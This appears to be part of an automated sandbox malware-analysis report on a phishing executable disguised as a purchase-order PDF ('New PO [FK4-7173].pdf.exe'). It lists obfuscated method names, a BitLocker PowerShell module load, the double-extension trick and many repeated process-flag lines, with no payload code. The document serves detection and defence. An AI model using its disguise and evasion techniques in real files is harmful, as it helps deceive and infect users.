                Source: 0.2.New PO [FK4-7173].pdf.exe.9540000.5.raw.unpack, E4gE8U6RQrGHXDU1Xf.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'KGQWQN3Nfk', 'iigWTDbPRx', 'ybhWzirZG3', 'zlPoF4Z9R7', 'ShPoCaQVTv', 'pNhoWLieDd', 'tO8ooW5nLv', 'Ov9Z6ajCIZPYH1fcgCQ'
                Source: 0.2.New PO [FK4-7173].pdf.exe.9540000.5.raw.unpack, mNeFugjRsHWDb5EIoQ.csHigh entropy of concatenated method names: 'iRE30qxlCt', 'RrM3T0T4OB', 'mhUPFCtNXa', 'V8LPCv020D', 'yuN3h78gFI', 'v9h3mKYvg8', 'YQc3GnyVVq', 'yqY3s0a6ir', 'SJZ3BIX089', 'jdo3w6fsuA'
                Source: 0.2.New PO [FK4-7173].pdf.exe.9540000.5.raw.unpack, fbFx0AYT6tZKydK92a.csHigh entropy of concatenated method names: 'sCptfb417k', 'aLZt8jQKBU', 'y5F6cuMiAN', 'PSG6Rnlmb2', 'xDM65vt7vg', 's6a6S9RF0o', 'k6r6eNGs1Q', 'OeO6nnHZjI', 'iPN6komghm', 'SYm6psLaog'
                Source: 0.2.New PO [FK4-7173].pdf.exe.9540000.5.raw.unpack, JfXSSmQwoak75HoTlP.csHigh entropy of concatenated method names: 'q2NP9C6IRy', 'IpPPKToKWZ', 'L1fPceXZkf', 'HO3PRqYWic', 'mo7PsjdZVr', 'J0YP5fxiPN', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.New PO [FK4-7173].pdf.exe.9540000.5.raw.unpack, VEggWg42tB04EDLaLZ.csHigh entropy of concatenated method names: 'QTOCucmU7e', 'vB7CXcxPKD', 'EGpCVW5rUq', 'zbmC19xbFx', 'vK9CU2a9LV', 'iYFCDELm4m', 'AkcQRRGcZvjYBfFRnl', 'IeFj5yfxhHvUiSMl0K', 'SgxCCQvUtZ', 'QHbCoG5tCD'
                Source: 0.2.New PO [FK4-7173].pdf.exe.9540000.5.raw.unpack, s4LIgWXFUhDin6PApX.csHigh entropy of concatenated method names: 'WnMog7sv2J', 'os9oxcCuer', 'vuMoEgISqw', 'ksbo6uFrJ2', 'BxaotBrIn7', 'Dqkorv5Gkb', 'H4iou6tl0r', 'RTNoXyPbuY', 'tkHolEdTCr', 'Ke4oVoN1uF'
                Source: 0.2.New PO [FK4-7173].pdf.exe.9540000.5.raw.unpack, cDWeU6S1tQc6onVTG1.csHigh entropy of concatenated method names: 'f2drwu6oKN', 'UMCr2e9yav', 'F4ir7MNmMA', 'ToString', 'gWqrjTDoKJ', 'anWrLE5eva', 'ctVdUYuh3Z09BHcwayK', 'Xc4t93usD3rYrPbqMUb', 'PiKAZfuIIe3xFxfQSR5'
                Source: 0.2.New PO [FK4-7173].pdf.exe.9540000.5.raw.unpack, F3XkWwW7Tq5wlTMV10.csHigh entropy of concatenated method names: 'fb6I63dq5', 'xhoZQkL7x', 'oEki30qfx', 'noL8BQHOS', 'wWQyEmbvx', 'A4CYQLW4P', 'qXsDW0r6qCIfRUZhGe', 'dyjme8yBGheeb6H0vv', 'nsaPer8ct', 'IerHIZpsX'
                Source: 0.2.New PO [FK4-7173].pdf.exe.9540000.5.raw.unpack, muHEUFkxknZL51WtRL.csHigh entropy of concatenated method names: 'A93uA1MOuV', 'D7duvqXa0a', 'AhduIDrdfl', 'AHkuZijdw4', 'fYJuf1GVnV', 'shKuiDw60c', 'n17u8Du54x', 'hT2uNdK44Q', 'tdauyUoqFJ', 'n0NuYchYHk'
                Source: 0.2.New PO [FK4-7173].pdf.exe.9540000.5.raw.unpack, GLVrYF9ELm4ma5cr3G.csHigh entropy of concatenated method names: 'B3FrgqFWHo', 'g8YrEupdmq', 'IhFrtNgOd1', 'e6oru5UTNC', 'Px6rXS6cMR', 'J6Rt7b0Qqv', 'OU3tjEodly', 'gNEtLj4QGj', 'Ebrt0inRE1', 'FdptQfinQ9'
                Source: 0.2.New PO [FK4-7173].pdf.exe.9540000.5.raw.unpack, M8mN3oE13atGHtcFI1.csHigh entropy of concatenated method names: 'Dispose', 'teXCQnPJO6', 'A7aWKJPqwb', 'i17NNqCR0c', 'sTTCTsf5pU', 'uIUCzLUcPH', 'ProcessDialogKey', 'g35WFfXSSm', 'SoaWCk75Ho', 'YlPWWfBoeq'
                Source: 0.2.New PO [FK4-7173].pdf.exe.4031490.1.raw.unpack, DoSAgyyGpW5rUqvbm9.csHigh entropy of concatenated method names: 'Ww86ZiJJux', 'rQo6iT9fgx', 'y4C6NlAwEu', 'l1f6yclmld', 'jSi6U6jA9i', 'oSb6DBeqvO', 'LFd63B6DCM', 'SXL6PgUWXG', 'JDm6btvT65', 'hVa6HBS5Jn'
                Source: 0.2.New PO [FK4-7173].pdf.exe.4031490.1.raw.unpack, oKNRk7wlowyM08kX7P.csHigh entropy of concatenated method names: 'ToString', 'hYMDhIGMZu', 'BJ6DKQZSaQ', 'mPwDchwaCw', 'vcCDRRCEUW', 'MV1D5RcYwl', 'TtgDSQ8sB9', 'isHDeN298L', 'MRTDneYJ1k', 'oWuDkRUGO2'
                Source: 0.2.New PO [FK4-7173].pdf.exe.4031490.1.raw.unpack, cIdfpdCoOPLN52Sw2QB.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'tfjHsC66nY', 'hUWHBsI975', 'YaLHwKfEiY', 'VH2H2WXbaD', 'f3fH7P2mj7', 'vFGHj05lol', 'SPxHLNsY8q'
                Source: 0.2.New PO [FK4-7173].pdf.exe.4031490.1.raw.unpack, ndCnPxzKyFK3jahlRe.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'C2tbO7sKiQ', 'jgHbUV4d00', 'E0GbDoClxR', 'B06b3EUlse', 'n84bPimLv0', 'ycNbbK74k1', 'eiebHUWlMO'
                Source: 0.2.New PO [FK4-7173].pdf.exe.4031490.1.raw.unpack, AG5TKjGmdswZbp1isL.csHigh entropy of concatenated method names: 'PvMONT3g9V', 'wQ0Oyb6YfH', 'T3iO9uHlV5', 'n9SOKYxe6c', 'DUYORH1fBZ', 'ooLO5YFxJJ', 'zNZOeJUWwX', 'FCXOn3n4y5', 'qRKOpWVnLd', 'B45Ohf5NdT'
                Source: 0.2.New PO [FK4-7173].pdf.exe.4031490.1.raw.unpack, OdgqxR2UpXNIuKtEvX.csHigh entropy of concatenated method names: 'rPo3V1ClBB', 'xsK31VG76A', 'ToString', 'JSj3xhkyQx', 'pbQ3EOQTCd', 'gsm36jFtOQ', 'ao13t4qMd8', 'DBk3r0bop4', 'KcM3uFSeDo', 'CZG3XkG3tC'
                Source: 0.2.New PO [FK4-7173].pdf.exe.4031490.1.raw.unpack, pqexlUCFjIpqGqFV97F.csHigh entropy of concatenated method names: 'EmDbAwUc69', 'Hjnbvp0KB6', 'pqubIV5HW7', 'JytbZrg2Bw', 'stebftmniJ', 'icLbiTZY7Y', 'PKRb8KtQVS', 'iA3bN8I6YN', 'IvobysV7KV', 'qnqbYj7q5V'
                Source: 0.2.New PO [FK4-7173].pdf.exe.4031490.1.raw.unpack, ocmU7eNMB7cxPKDXQ0.csHigh entropy of concatenated method names: 'q1KEs51P7X', 'eiLEBZIYbC', 'gfsEwfopLa', 'p2HE2dE6Rw', 'fQNE7CctSu', 'GX2EjECqyG', 'RVjELfb1TL', 'se1E0dhRU1', 'jiuEQCdyQd', 'mKdETU9cAs'
                Source: 0.2.New PO [FK4-7173].pdf.exe.4031490.1.raw.unpack, BBoeqVTcNItb4iJcWG.csHigh entropy of concatenated method names: 'OLKbCISeEo', 'rKhbop7xvK', 'ETub4hKpim', 'NTmbxyow9s', 'u3pbEsXnpZ', 'ouRbt0ca8l', 'A12brC5Djr', 'sgcPL3SyI2', 'UqPP0i9Oyt', 'VJXPQGND7s'
                Source: 0.2.New PO [FK4-7173].pdf.exe.4031490.1.raw.unpack, WQh59WeKwhIFFeMBLE.csHigh entropy of concatenated method names: 'rZOux9bRrS', 'vJru6BGAgX', 'h6turjg4qN', 'KcUrTUpxnr', 'zEtrzREASJ', 'vWIuF0XNJ5', 'SMnuCPxcnU', 'mynuWAytMa', 'FRHuoKRFJe', 'NVEu47rpst'
                Source: 0.2.New PO [FK4-7173].pdf.exe.4031490.1.raw.unpack, YTsf5p0UqIULUcPHE3.csHigh entropy of concatenated method names: 'MwrPx3Nql8', 'cCWPEH7Yq4', 'LfdP6RqlrA', 'MTUPtg75wm', 'HOyPr3ENeg', 'WdbPuHWgHS', 'Y8GPX2SQtB', 'Jb1Pliu3BE', 'CP6PVlsZ4l', 'BUvP1rWKvf'
                Source: 0.2.New PO [FK4-7173].pdf.exe.4031490.1.raw.unpack, E4gE8U6RQrGHXDU1Xf.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'KGQWQN3Nfk', 'iigWTDbPRx', 'ybhWzirZG3', 'zlPoF4Z9R7', 'ShPoCaQVTv', 'pNhoWLieDd', 'tO8ooW5nLv', 'Ov9Z6ajCIZPYH1fcgCQ'
                Source: 0.2.New PO [FK4-7173].pdf.exe.4031490.1.raw.unpack, mNeFugjRsHWDb5EIoQ.csHigh entropy of concatenated method names: 'iRE30qxlCt', 'RrM3T0T4OB', 'mhUPFCtNXa', 'V8LPCv020D', 'yuN3h78gFI', 'v9h3mKYvg8', 'YQc3GnyVVq', 'yqY3s0a6ir', 'SJZ3BIX089', 'jdo3w6fsuA'
                Source: 0.2.New PO [FK4-7173].pdf.exe.4031490.1.raw.unpack, fbFx0AYT6tZKydK92a.csHigh entropy of concatenated method names: 'sCptfb417k', 'aLZt8jQKBU', 'y5F6cuMiAN', 'PSG6Rnlmb2', 'xDM65vt7vg', 's6a6S9RF0o', 'k6r6eNGs1Q', 'OeO6nnHZjI', 'iPN6komghm', 'SYm6psLaog'
                Source: 0.2.New PO [FK4-7173].pdf.exe.4031490.1.raw.unpack, JfXSSmQwoak75HoTlP.csHigh entropy of concatenated method names: 'q2NP9C6IRy', 'IpPPKToKWZ', 'L1fPceXZkf', 'HO3PRqYWic', 'mo7PsjdZVr', 'J0YP5fxiPN', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.New PO [FK4-7173].pdf.exe.4031490.1.raw.unpack, VEggWg42tB04EDLaLZ.csHigh entropy of concatenated method names: 'QTOCucmU7e', 'vB7CXcxPKD', 'EGpCVW5rUq', 'zbmC19xbFx', 'vK9CU2a9LV', 'iYFCDELm4m', 'AkcQRRGcZvjYBfFRnl', 'IeFj5yfxhHvUiSMl0K', 'SgxCCQvUtZ', 'QHbCoG5tCD'
                Source: 0.2.New PO [FK4-7173].pdf.exe.4031490.1.raw.unpack, s4LIgWXFUhDin6PApX.csHigh entropy of concatenated method names: 'WnMog7sv2J', 'os9oxcCuer', 'vuMoEgISqw', 'ksbo6uFrJ2', 'BxaotBrIn7', 'Dqkorv5Gkb', 'H4iou6tl0r', 'RTNoXyPbuY', 'tkHolEdTCr', 'Ke4oVoN1uF'
                Source: 0.2.New PO [FK4-7173].pdf.exe.4031490.1.raw.unpack, cDWeU6S1tQc6onVTG1.csHigh entropy of concatenated method names: 'f2drwu6oKN', 'UMCr2e9yav', 'F4ir7MNmMA', 'ToString', 'gWqrjTDoKJ', 'anWrLE5eva', 'ctVdUYuh3Z09BHcwayK', 'Xc4t93usD3rYrPbqMUb', 'PiKAZfuIIe3xFxfQSR5'
                Source: 0.2.New PO [FK4-7173].pdf.exe.4031490.1.raw.unpack, F3XkWwW7Tq5wlTMV10.csHigh entropy of concatenated method names: 'fb6I63dq5', 'xhoZQkL7x', 'oEki30qfx', 'noL8BQHOS', 'wWQyEmbvx', 'A4CYQLW4P', 'qXsDW0r6qCIfRUZhGe', 'dyjme8yBGheeb6H0vv', 'nsaPer8ct', 'IerHIZpsX'
                Source: 0.2.New PO [FK4-7173].pdf.exe.4031490.1.raw.unpack, muHEUFkxknZL51WtRL.csHigh entropy of concatenated method names: 'A93uA1MOuV', 'D7duvqXa0a', 'AhduIDrdfl', 'AHkuZijdw4', 'fYJuf1GVnV', 'shKuiDw60c', 'n17u8Du54x', 'hT2uNdK44Q', 'tdauyUoqFJ', 'n0NuYchYHk'
                Source: 0.2.New PO [FK4-7173].pdf.exe.4031490.1.raw.unpack, GLVrYF9ELm4ma5cr3G.csHigh entropy of concatenated method names: 'B3FrgqFWHo', 'g8YrEupdmq', 'IhFrtNgOd1', 'e6oru5UTNC', 'Px6rXS6cMR', 'J6Rt7b0Qqv', 'OU3tjEodly', 'gNEtLj4QGj', 'Ebrt0inRE1', 'FdptQfinQ9'
                Source: 0.2.New PO [FK4-7173].pdf.exe.4031490.1.raw.unpack, M8mN3oE13atGHtcFI1.csHigh entropy of concatenated method names: 'Dispose', 'teXCQnPJO6', 'A7aWKJPqwb', 'i17NNqCR0c', 'sTTCTsf5pU', 'uIUCzLUcPH', 'ProcessDialogKey', 'g35WFfXSSm', 'SoaWCk75Ho', 'YlPWWfBoeq'

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Uses an obfuscated file name to hide its real file extension (double extension)
                Source: Possible double extension: pdf.exeStatic PE information: New PO [FK4-7173].pdf.exe
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
